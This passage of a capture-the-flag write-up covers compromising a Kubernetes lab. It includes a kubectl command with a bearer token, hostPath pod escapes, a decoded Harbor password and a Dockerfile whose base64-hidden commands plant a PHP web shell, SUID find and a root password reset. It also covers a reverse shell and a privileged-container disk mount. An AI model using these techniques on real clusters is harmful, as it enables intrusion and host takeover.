    kubectl -s https://172.22.15.75:6443/ --insecure-skip-tls-verify=true --token=eyJhbGciOiJSUzI1NiIsImtpZCI6IlRSaDd3eFBhYXFNTkg5OUh0TnNwcW00c0Zpand4LUliXzNHRU1raXFjTzQifQ.eyJhdWQiOlsiYXBpIiwiaXN0aW8tY2EiXSwiZXhwIjoxNzY2MzMyNTkzLCJpYXQiOjE3MzQ3OTY1OTMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2YyIsImp0aSI6IjZhMTgzYzRhLTQ1NTgtNDhhMi04Y2Q0LTk4MmVmMjJhY2ZlMyIsImt1YmVybmV0ZXMuaW8iOnsibmFtZXNwYWNlIjoiZGVmYXVsdCIsIm5vZGUiOnsibmFtZSI6Im5vZGUyIiwidWlkIjoiYjAzYjUwZTgtOTBkOS00YjdkLWFmM2EtMGZiMjY3MWUyNjFmIn0sInBvZCI6eyJuYW1lIjoibXlzcWwtNmRmODc2ZDZkYy1mNnFmZyIsInVpZCI6ImNmMzMyYjUxLWM2NDYtNDExNi04ZGRhLTFmMDJiZTAyM2FmZSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoibXlzcWwiLCJ1aWQiOiJhNTMyNDZlNy0yZDFkLTQxMzMtOGM4OS05ZGNhMWI5YmIxNGYifSwid2FybmFmdGVyIjoxNzM0ODAwMjAwfSwibmJmIjoxNzM0Nzk2NTkzLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpteXNxbCJ9.N0NPwdfTCfxNaQ8HUv8FwThLYOwY2pHQ9fcFzs7VyDgnqBDMjjrViVxOxlaSCPG_WPnLwwJUp5BKS3Dm0gTiHnvP7oA7c0HQ3HSMTk_A9D9Ty5MFyViWSVazon416QyQpW0xRVVIrnufKMPd62vurMel5eaLlYvU-hkQInPOenSAFmpBdoCXCWY93-hPvJ7p4fDwmSZsSdVY7CpZSHlKDWFWXinHGVg5E0FWJYDYmAP61f0rAKEVMpl82YdMcrGXQWljmPwoDe2kS1DSH9l-j9vejn3RkuIW1hyUS7NJv_Sx9CvQkeJvxMFO_LmRUGMy0u8wzE_WgvK50KTN2qOaSQ uncordon master

The taints need to go; the operation above removes them along the way. Then create a new container and escape through a host mount.

The mounting pod works the same way as before:

    apiVersion: v1
    kind: Pod
    metadata:
      name: control-master-x
    spec:
      tolerations:
        - key: node-role.kubernetes.io/master
          operator: Exists
          effect: NoSchedule
      containers:
        - name: control-master-x
          image: 172.22.18.64/public/mysql:5.6
          command: ["/bin/sleep", "3650d"]
          volumeMounts:
          - name: master
            mountPath: /tmp
      volumes:
      - name: master
        hostPath:
          path: /
          type: Directory

flag06

For the node2 node, pin the same kind of pod to node2 with a nodeSelector:

    apiVersion: v1
    kind: Pod
    metadata:
      name: control-master-x1
    spec:
      tolerations:
        - key: node-role.kubernetes.io/master
          operator: Exists
          effect: NoSchedule
      containers:
        - name: control-master-x
          image: 172.22.18.64/public/mysql:5.6
          command: ["/bin/sleep", "3650d"]
          volumeMounts:
          - name: master
            mountPath: /tmp
      volumes:
      - name: master
        hostPath:
          path: /
          type: Directory
      nodeSelector:
        kubernetes.io/hostname: node2

flag07

Write a public key onto the node from flag06 and connect to it.

Copy fscan and gost over with scp.

    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.22.15.75  netmask 255.255.0.0  broadcast 172.22.255.255
            inet6 fe80::216:3eff:fe1b:8d07  prefixlen 64  scopeid 0x20<link>
            ether 00:16:3e:1b:8d:07  txqueuelen 1000  (Ethernet)
            RX packets 347361  bytes 230265054 (219.5 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 219473  bytes 114617018 (109.3 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.22.50.75  netmask 255.255.0.0  broadcast 172.22.255.255
            inet6 fe80::216:3eff:fe18:6372  prefixlen 64  scopeid 0x20<link>
            ether 00:16:3e:18:63:72  txqueuelen 1000  (Ethernet)
            RX packets 1149  bytes 83330 (81.3 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 1118  bytes 94102 (91.8 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Scanning the second interface's range gives:

    172.22.50.45:22 open
    172.22.50.75:22 open
    172.22.50.45:80 open
    172.22.50.75:111 open
    172.22.50.75:179 open
    172.22.50.75:5000 open
    172.22.50.75:9253 open
    172.22.50.75:9353 open
    172.22.50.75:10000 open
    172.22.50.75:10249 open
    172.22.50.75:10248 open
    172.22.50.75:10259 open
    172.22.50.75:10257 open
    172.22.50.75:10256 open
    172.22.50.75:10250 open
    172.22.50.75:30020 open
    172.22.50.75:32686 open
    [*] alive ports len is: 17
    start vulscan
    [*] WebTitle: http://172.22.50.45 code:403 len:277 title:403 Forbidden
    [*] WebTitle: http://172.22.50.75:10249 code:404 len:19 title:None
    [*] WebTitle: http://172.22.50.75:5000 code:200 len:0 title:None
    [*] WebTitle: http://172.22.50.75:10248 code:404 len:19 title:None
    [*] WebTitle: http://172.22.50.75:10000 code:400 len:0 title:None
    [*] WebTitle: http://172.22.50.75:9253 code:404 len:19 title:None
    [*] WebTitle: http://172.22.50.75:9353 code:404 len:19 title:None
    [*] WebTitle: https://172.22.50.75:32686 code:200 len:1422 title:Kubernetes Dashboard
    [*] WebTitle: https://172.22.50.75:10250 code:404 len:19 title:None
    [*] WebTitle: http://172.22.50.75:10256 code:404 len:19 title:None
    [*] WebTitle: https://172.22.50.75:10259 code:403 len:217 title:None
    [*] WebTitle: https://172.22.50.75:10257 code:403 len:217 title:None
    [+] InfoScan:https://172.22.50.75:32686 [Kubernetes]

This reveals two new network segments: 172.22.15.0 and 172.22.50.0.
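One detail worth keeping in mind when choosing scan ranges: the interfaces report a netmask of 255.255.0.0, so from the host's point of view both addresses sit in the same /16, while the writeup treats them as separate /24-sized segments for scanning. A short sketch with the standard `ipaddress` module, using the interface values reported for eth0 and eth1, shows both views:

```python
import ipaddress

# Address/netmask pairs as reported for eth0 and eth1.
eth0 = ipaddress.ip_interface("172.22.15.75/255.255.0.0")
eth1 = ipaddress.ip_interface("172.22.50.75/255.255.0.0")

# The network each interface believes it is on.
print(eth0.network, eth1.network)

# The /24 ranges that are practical to hand to a scanner.
scan_ranges = sorted(
    str(ipaddress.ip_network(f"{iface.ip}/24", strict=False))
    for iface in (eth0, eth1)
)
print(scan_ranges)
```

Scanning per /24 keeps each run short. Sweeping the whole /16 through a chained proxy would take far longer.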

Further enumeration turns up a secret named harbor-registry-secret:

    [root@master ~]# kubectl get secrets harbor-registry-secret
    NAME                     TYPE                             DATA   AGE
    harbor-registry-secret   kubernetes.io/dockerconfigjson   1      115d

    [root@master ~]# kubectl describe secret harbor-registry-secret
    Name:         harbor-registry-secret
    Namespace:    default
    Labels:       <none>
    Annotations:  <none>

    Type:  kubernetes.io/dockerconfigjson

    Data
    ====
    .dockerconfigjson:  121 bytes
    [root@master ~]# kubectl get secret harbor-registry-secret -o jsonpath='{.data.\.dockerconfigjson}' | base64 --decode
    {"auths":{"172.22.18.64":{"username":"admin","password":"password@nk9DLwqce","auth":"YWRtaW46cGFzc3dvcmRAbms5REx3cWNl"}}}
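In a `kubernetes.io/dockerconfigjson` secret, the `auth` field is just base64 of `username:password`, so it can serve as a cross-check on the plaintext fields (or as the only source when those fields are absent). A minimal sketch, with `registry_credentials` as an illustrative helper name:

```python
import base64
import json

# The decoded secret exactly as printed above.
docker_config = (
    '{"auths":{"172.22.18.64":{"username":"admin","password":"password@nk9DLwqce",'
    '"auth":"YWRtaW46cGFzc3dvcmRAbms5REx3cWNl"}}}'
)


def registry_credentials(config_json: str) -> dict:
    """Map each registry to the (user, password) pair encoded in its auth field."""
    creds = {}
    for registry, entry in json.loads(config_json)["auths"].items():
        decoded = base64.b64decode(entry["auth"]).decode("utf-8")
        user, _, password = decoded.partition(":")
        creds[registry] = (user, password)
    return creds


creds = registry_credentials(docker_config)
for registry, (user, password) in creds.items():
    print(registry, user, password)
```

The length of the JSON string also matches the `121 bytes` reported by `kubectl describe`, which is a quick way to confirm nothing was lost when copying it.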

Log in to Harbor with the recovered password.

There is a private image named flag.

Because it is private, it can only be pulled after logging in:

    docker login 172.22.18.64
    docker pull 172.22.18.64/hospital/flag:latest
    docker run -id --name flag 172.22.18.64/hospital/flag
    docker exec -it flag /bin/bash
    cat /flag

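flag08

Harbor image sync and privileged escalation

The Harbor logs show that some service pulls the hospital/system image from Harbor every 20 minutes and deploys it.

For details, open the hospital/system image and look at its pull times and logs.

Combined with the earlier enumeration, which found 172.22.50.45, a reasonable guess is that port 80 on that IP is served by a container created from the 172.22.18.64/hospital/system image

(the 403 page seen earlier).

So we can build our own image under the same name, hospital/system, and push it to Harbor. After 20 minutes the malicious image gets pulled automatically.

The Dockerfile is as follows:

    FROM 172.22.18.64/hospital/system
    RUN echo ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+JyA+IC92YXIvd3d3L2h0bWwvc2hlbGwucGhwICYmIGNobW9kIHUrcyAvdXNyL2Jpbi9maW5k | base64 -d | bash && echo password | echo ZWNobyAicm9vdDpwYXNzd29yZCIgfCBjaHBhc3N3ZA== | base64 -d | bash
    ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"]

Then pull and push:

    # Pull the image first
    docker login 172.22.18.64
    # enter the account and password
    docker pull 172.22.18.64/hospital/flag:latest
    # Then push
    docker push 172.22.18.64/hospital/system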

After the sync, connect with AntSword and upload a copy of nc.

Send a shell back to the 172.22.15.75 target.

Check whether the container is running with privileged permissions:

    cat /proc/self/status | grep CapEff
    CapEff:	0000003fffffffff

    # the standard privileged-escape routine
    df -h
    Filesystem      Size  Used Avail Use% Mounted on
    overlay          40G  4.3G   33G  12% /
    tmpfs            64M     0   64M   0% /dev
    tmpfs           1.9G     0  1.9G   0% /sys/fs/cgroup
    shm              64M     0   64M   0% /dev/shm
    /dev/vda3        40G  4.3G   33G  12% /etc/hosts

    mkdir /test && mount /dev/vda3 /test
    cat /test/f*
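`CapEff` is a bitmask of effective Linux capabilities, and `0000003fffffffff` has every bit from 0 to 37 set, which is the usual signature of a privileged container. For comparison, the sketch below also decodes `00000000a80425fb`, a value commonly seen in default, unprivileged Docker containers (included here as an assumption about a typical setup, not something taken from this lab):

```python
CAP_SYS_ADMIN = 21  # capability number from linux/capability.h; mount() needs it


def capability_bits(hex_mask: str) -> list:
    """Return the capability numbers whose bits are set in a CapEff mask."""
    mask = int(hex_mask, 16)
    return [bit for bit in range(64) if (mask >> bit) & 1]


observed = capability_bits("0000003fffffffff")         # value from the container above
typical_default = capability_bits("00000000a80425fb")  # assumed unprivileged baseline

print("observed:", len(observed), "capabilities,",
      "CAP_SYS_ADMIN" if CAP_SYS_ADMIN in observed else "no CAP_SYS_ADMIN")
print("default :", len(typical_default), "capabilities,",
      "CAP_SYS_ADMIN" if CAP_SYS_ADMIN in typical_default else "no CAP_SYS_ADMIN")
```

Having `CAP_SYS_ADMIN` together with access to the host's block devices is what lets the `mount /dev/vda3 /test` step succeed.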

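That's it. It was quite a roller coaster: the whole thing took me a full 14 hours. Along the way the proxy kept misbehaving, and I couldn't tell whether the problem was the proxy or the range itself. Most likely it was the range, since I couldn't even reach port 8080 on the entry host, which just kept spinning. Luckily it all worked out in the end, and I'm thrilled.

References

https://xz.aliyun.com/t/16872?time__1311=Gui%3DGK0IqGxRx05q4%2BxCq7KdiKquGaWWoD#toc-2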

https://mp.weixin.qq.com/s?__biz=MzkxOTYwMDI2OA==&mid=2247484301&idx=1&sn=cc09d0ed73141c9df1190979180a4bb6